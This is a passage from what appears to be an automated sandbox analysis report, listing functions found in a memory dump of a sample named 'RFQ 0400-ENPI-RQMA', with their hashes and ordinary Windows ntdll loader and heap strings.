                                                                                      • Instruction Fuzzy Hash: 6631D271200141EFDB12DBA9C885FE6B7E8EF04E24F14055AF641EB3A1EB70A944CA64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpDynamicShimModule, xrefs: 0142A998
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0142A992
                                                                                      • apphelp.dll, xrefs: 013E2462
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0142A9A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-176724104
                                                                                      • Opcode ID: 51dcc16f093ca4a809555d2c75735f319cd3627c93bedda640c688a3ce770784
                                                                                      • Instruction ID: 27ec41419c7b8dce5decb7ed1fea62636ac2ea277c7bfecbca67dc74d2b39e72
                                                                                      • Opcode Fuzzy Hash: 51dcc16f093ca4a809555d2c75735f319cd3627c93bedda640c688a3ce770784
                                                                                      • Instruction Fuzzy Hash: 713148B1A00212ABDB319F5ED8C5AAB77B8FF84B04F66041EED0067775D7706881CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013B9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      • Opcode ID: 15e02136995517b2ed1fb8d8bec5bc2e0f1a6bd082bba006d5f0233c85ebd204
                                                                                      • Instruction ID: 7c74e631174fe1cff4faeaeb1eed752a95e14e01026883b8790eacbcd6260cde
                                                                                      • Opcode Fuzzy Hash: 15e02136995517b2ed1fb8d8bec5bc2e0f1a6bd082bba006d5f0233c85ebd204
                                                                                      • Instruction Fuzzy Hash: CF31C672600105EFDB02DB5ACC85FDAB7B8EF45769F14405AEA14AB6A1E770ED40CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 013C1728
                                                                                      • HEAP: , xrefs: 013C1596
                                                                                      • HEAP[%wZ]: , xrefs: 013C1712
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      • Opcode ID: 1ea15865ef9ab3d350534480872008fb267232c0b5549c6da30f00032ff76f57
                                                                                      • Instruction ID: b70cc875f1f9f53987f6fec6efa077cdd00b78ece1bbbb70c6feb94d6e8df3c7
                                                                                      • Opcode Fuzzy Hash: 1ea15865ef9ab3d350534480872008fb267232c0b5549c6da30f00032ff76f57
                                                                                      • Instruction Fuzzy Hash: 2AE11F30A04246DFDB29CF2CC490BBABBF5AF44718F18845EE996CB246E734E845DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                      • API String ID: 0-2779062949
                                                                                      • Opcode ID: 15fb439c65ee33183d30d0671080b3bb94a7d04f1e578102ca61a0d97c1d9470
                                                                                      • Instruction ID: 8072a8de249ae1d8b66b073357c1b6ab88bcde6a371c06fc3a637d61f8b81e1f
                                                                                      • Opcode Fuzzy Hash: 15fb439c65ee33183d30d0671080b3bb94a7d04f1e578102ca61a0d97c1d9470
                                                                                      • Instruction Fuzzy Hash: B2A15D71D416299BDB31DF68CC88BEAB7B8EF44704F1001EADA09A7260E7359E85CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01447410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                      • API String ID: 0-3870751728
                                                                                      • Opcode ID: 92bfa65298a4b790ac1d7b1287d8d9910d88308fe47cc603313019211288330e
                                                                                      • Instruction ID: b2c1c1974f7a77e4bf8950bd45955ec4d0dec69b450884716fa6207981cdc14e
                                                                                      • Opcode Fuzzy Hash: 92bfa65298a4b790ac1d7b1287d8d9910d88308fe47cc603313019211288330e
                                                                                      • Instruction Fuzzy Hash: 9C910AB0E006159FEB14CFA9C480BADBBF1BF58315F14C16AD909AB3A1E7759842CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013F909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %$&$@
                                                                                      • API String ID: 0-1537733988
                                                                                      • Opcode ID: e2842bb2ed2759dbe0c855b1a99fa523a8afe483e09669e53cef3448e9886309
                                                                                      • Instruction ID: 1dfe2708423e066990cf4ca7de8d6c728373af021c4798a3dfb610ab55db0d1e
                                                                                      • Opcode Fuzzy Hash: e2842bb2ed2759dbe0c855b1a99fa523a8afe483e09669e53cef3448e9886309
                                                                                      • Instruction Fuzzy Hash: 1371BF7050830A9FD715DF29C580B6BBBE9BFD861CF108A2EF696476A1C731D805CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013B758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                      • API String ID: 0-1151232445
                                                                                      • Opcode ID: 0180f7a7665f9dd510762181e132ba717095e2c49e0cadd165b910f5c2ea1089
                                                                                      • Instruction ID: 5b1a134d8f8d6358154488d918c9b5065161599058ed1136c01771df9125e885
                                                                                      • Opcode Fuzzy Hash: 0180f7a7665f9dd510762181e132ba717095e2c49e0cadd165b910f5c2ea1089
                                                                                      • Instruction Fuzzy Hash: 8A41E7703412808FEF25CA5DC0E47FA7BA4DF81358F28446AD7464BBEAE674D486C752
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0147C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0147C1C5
                                                                                      • @, xrefs: 0147C1F1
                                                                                      • PreferredUILanguages, xrefs: 0147C212
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                      • API String ID: 0-2968386058
                                                                                      • Opcode ID: 889bf4daa9a59fd958f431b5cee384f385c38d50b680264df333a486c9b1ec31
                                                                                      • Instruction ID: a885de758dd5e4ed8ca0ac16919e03ea67aa1f3252db1b6605cc0a1f2611ffbd
                                                                                      • Opcode Fuzzy Hash: 889bf4daa9a59fd958f431b5cee384f385c38d50b680264df333a486c9b1ec31
                                                                                      • Instruction Fuzzy Hash: 3A416571E0021AEBDF11DFD9C895FEEB7B8AB14704F14406BE605F7290E7749A458B50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01454144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                      • API String ID: 0-1373925480
                                                                                      • Opcode ID: 18a6d74f0d3b001ddb8b488eb22d5d9368a74ad500bbd1693cc1406db325b539
                                                                                      • Instruction ID: 45e6df6e10bb60e72686af50266fc74f7ed1c990f80988fbb7e499c3aa8b530b
                                                                                      • Opcode Fuzzy Hash: 18a6d74f0d3b001ddb8b488eb22d5d9368a74ad500bbd1693cc1406db325b539
                                                                                      • Instruction Fuzzy Hash: 46413672A042588BEB21DBD9D844BADBBB4FF55384F18005BED01EF3A2E7348981CB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013F33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 014329FE
                                                                                      • RtlCreateActivationContext, xrefs: 014329F9
                                                                                      • Actx , xrefs: 013F33AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                      • API String ID: 0-859632880
                                                                                      • Opcode ID: e06a522293ff61451a1651d21b7f56f9e5e50606ad2b5fb2c0040258148a7ec4
                                                                                      • Instruction ID: 5e03d28bea0e10bc9aa761c748ae0dbb3b83ee8db145e6a6bb67b62b174d0f7b
                                                                                      • Opcode Fuzzy Hash: e06a522293ff61451a1651d21b7f56f9e5e50606ad2b5fb2c0040258148a7ec4
                                                                                      • Instruction Fuzzy Hash: 693103326003059FEB26DE58D880F967BA4FB88718F15446EEE05AF391C770E842C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0144B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • GlobalFlag, xrefs: 0144B68F
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0144B632
                                                                                      • @, xrefs: 0144B670
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: 1b1cfe5f5be970472d3f181b99200e9cef5070264ab47027a919296227dabe19
                                                                                      • Instruction ID: 21b36389da87b1e1d9aae03de46996c77530f2dab4aa93ebef42ae9046316c2a
                                                                                      • Opcode Fuzzy Hash: 1b1cfe5f5be970472d3f181b99200e9cef5070264ab47027a919296227dabe19
                                                                                      • Instruction Fuzzy Hash: BA313EB1A00219AFEB11EF99CC81EEFBB78EF54744F14046AE605A7251D774DE04CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01401270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • BuildLabEx, xrefs: 0140130F
                                                                                      • @, xrefs: 014012A5
                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0140127B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                      • API String ID: 0-3051831665
                                                                                      • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                      • Instruction ID: 3485b58c493aa8bf0fa774895bb19a477b91949bbabeb0da609a82593ced290a
                                                                                      • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                      • Instruction Fuzzy Hash: 2A319372900519AFDB12EF96CD44EDEBBBDEB94B54F004036E614A72F0D770DA058B50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 014420F3
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01442104
                                                                                      • LdrpInitializationFailure, xrefs: 014420FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-2986994758
                                                                                      • Opcode ID: ba3531395b4338f5555d4f838b05d567f6fdc4fefd88ae78006ae595ac2386e8
                                                                                      • Instruction ID: 29dde7ba9199eff2fff5c761c6051891f627726c389af3b1e58bb118b6fccfb7
                                                                                      • Opcode Fuzzy Hash: ba3531395b4338f5555d4f838b05d567f6fdc4fefd88ae78006ae595ac2386e8
                                                                                      • Instruction Fuzzy Hash: 32F0C8756403086BE724EA4EDC46F963B6CEB54B58F54005EFB007B3A1D1F0A940C691
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: #%u
                                                                                      • API String ID: 48624451-232158463
                                                                                      • Opcode ID: 15b2343b725dd8f512af2b43ab15b112743b6e400cf2e2d22f851cbf9d18752f
                                                                                      • Instruction ID: 3429d76d2d3c1447f82ba348bdef1198c1c55dcee63a9ac4d75f0cf2dd603477
                                                                                      • Opcode Fuzzy Hash: 15b2343b725dd8f512af2b43ab15b112743b6e400cf2e2d22f851cbf9d18752f
                                                                                      • Instruction Fuzzy Hash: 11716FB2A0010A9FDB05DFA9D980FAEB7F8FF18704F15406AE905E7261E674ED41CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013D52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: a834e26883dfe9b23050da89bdce8b784ceb2abf7df35f7e38bba0946e53752a
                                                                                      • Instruction ID: 8bdc06f326b1134695128f11d566bb4919e4d2ab5a0e27de81ec2e66c64d6694
                                                                                      • Opcode Fuzzy Hash: a834e26883dfe9b23050da89bdce8b784ceb2abf7df35f7e38bba0946e53752a
                                                                                      • Instruction Fuzzy Hash: DB329B726083218BD7248F19D480B3FBBF5EF84758F55492EFA95972A0E734D980CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0148A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `$`
                                                                                      • API String ID: 0-197956300
                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                      • Instruction ID: c3cc2e9c16eab81d199c2310f606a33474d3e9a932439520aa6b3212fb68c1c5
                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                      • Instruction Fuzzy Hash: 97C103312043429BEB25EF29C840B2FBBE5AFD4318F284A2FF695872A0D7B4D545CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 013CA2FB
                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 013CA309
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                      • API String ID: 0-2876891731
                                                                                      • Opcode ID: ae5175ae584bc9ce9fce5ab642a489152b70c9fd4462e50ec927713d227102e6
                                                                                      • Instruction ID: 0fce55f1379df46652c9a5b972514e70b5a2e8e3e177697dbb3a089aac90706d
                                                                                      • Opcode Fuzzy Hash: ae5175ae584bc9ce9fce5ab642a489152b70c9fd4462e50ec927713d227102e6
                                                                                      • Instruction Fuzzy Hash: FB41B075A04659DBDB11CF6DC450B6A7BB4FF84B08F1440AAE900DB3A1E3B5DE40CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 014535BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: 7368d482ac6374e54f5a6bc4abf76bc56911df526b7db216ac5f447b0f4748e7
                                                                                      • Instruction ID: 0dddc3863e4c23e1700fe09bb33d8030c2ecf949334bc7be774fc1c1aca8450c
                                                                                      • Opcode Fuzzy Hash: 7368d482ac6374e54f5a6bc4abf76bc56911df526b7db216ac5f447b0f4748e7
                                                                                      • Instruction Fuzzy Hash: 2D318D362087429BE321DF69D454B2AB7E4FF95754F04086EFD588B3A2E730D905CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013F329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local\$@
                                                                                      • API String ID: 0-380025441
                                                                                      • Opcode ID: e3838348e70f0f15c9979f5030b1278ea6f3c3215835fb5b69146d2888e395e8
                                                                                      • Instruction ID: c37dd721858f222c2e43ad2586c17050e7af16f0b03fdee9258dd9291f6bc42d
                                                                                      • Opcode Fuzzy Hash: e3838348e70f0f15c9979f5030b1278ea6f3c3215835fb5b69146d2888e395e8
                                                                                      • Instruction Fuzzy Hash: 3831B1B2549305AFD321DF29C884A6BBBE8FF94658F44092FFA9583350DA34DD04CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                      • API String ID: 2994545307-4008356553
                                                                                      • Opcode ID: 4c794cf0b732455e287d341c230b764324149b06a64f676fb75b43a908ba4aea
                                                                                      • Instruction ID: ccfddab3637653d6a98ec8c43d6f299e87fe2da50b1aeac6871064c5a1621b40
                                                                                      • Opcode Fuzzy Hash: 4c794cf0b732455e287d341c230b764324149b06a64f676fb75b43a908ba4aea
                                                                                      • Instruction Fuzzy Hash: 0E01D1B2250704AFE312DF28CD45F1677E8E794729F01893EAA4CC7290E374D804CB46
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 013C7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9bb0173f5a76943718678dce37ad5a834dc9d918a7bf6782c52a730d6809cfc
                                                                                      • Instruction ID: 2d77ef21d3dd0e0a338115672b7e315f752d32b15ee47f481821baea67539b83
                                                                                      • Opcode Fuzzy Hash: b9bb0173f5a76943718678dce37ad5a834dc9d918a7bf6782c52a730d6809cfc
                                                                                      • Instruction Fuzzy Hash: A7A16971608342CFC721DF29D480A2ABBE5BF98B18F14492EE98597351E770ED45CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01446420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: eb78fb70228952a2a4b7ef660988da17f6f7425f194172f85889808b04450e71
                                                                                      • Instruction ID: 8f80c92828f6888fe98f22915859bfdb9bc7ce97272d68dfb6a9d14493c95d1d
                                                                                      • Opcode Fuzzy Hash: eb78fb70228952a2a4b7ef660988da17f6f7425f194172f85889808b04450e71
                                                                                      • Instruction Fuzzy Hash: 87917372940219AFEB21DF99DC85FAE7BB8EF55754F110066F604AB2E0D774AD00CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0147B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PreferredUILanguages
                                                                                      • API String ID: 0-1884656846
                                                                                      • Opcode ID: b18c17fcab821c9886c1a2f7a31e4ba52530ae0516d4705a1016551a87e1d9d8
                                                                                      • Instruction ID: 79f4c4595e7ebd4232830c5e256f0d78c91f3f0e0f9fea7ebaac375ab8211fc7
                                                                                      • Opcode Fuzzy Hash: b18c17fcab821c9886c1a2f7a31e4ba52530ae0516d4705a1016551a87e1d9d8
                                                                                      • Instruction Fuzzy Hash: F041A172D00219ABDB11DA99C844BEFBBB9EF44758F05016BEE11EB360D634DE81C7A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0146705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: kLsE
                                                                                      • API String ID: 0-3058123920
                                                                                      • Opcode ID: 12723c19e6b995bdf16f66ed1c1d114704ca30224ae814a61f66690dcdd23de7
                                                                                      • Instruction ID: 173deb65a373bc6617517f23d77da3f8724b9185f279a7b586f892c4b855c2f2
                                                                                      • Opcode Fuzzy Hash: 12723c19e6b995bdf16f66ed1c1d114704ca30224ae814a61f66690dcdd23de7
                                                                                      • Instruction Fuzzy Hash: 7D414B7150135287E731AB7DE8C4BA63F98AB50B2DF15011FED505A2F9CB744886C7A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

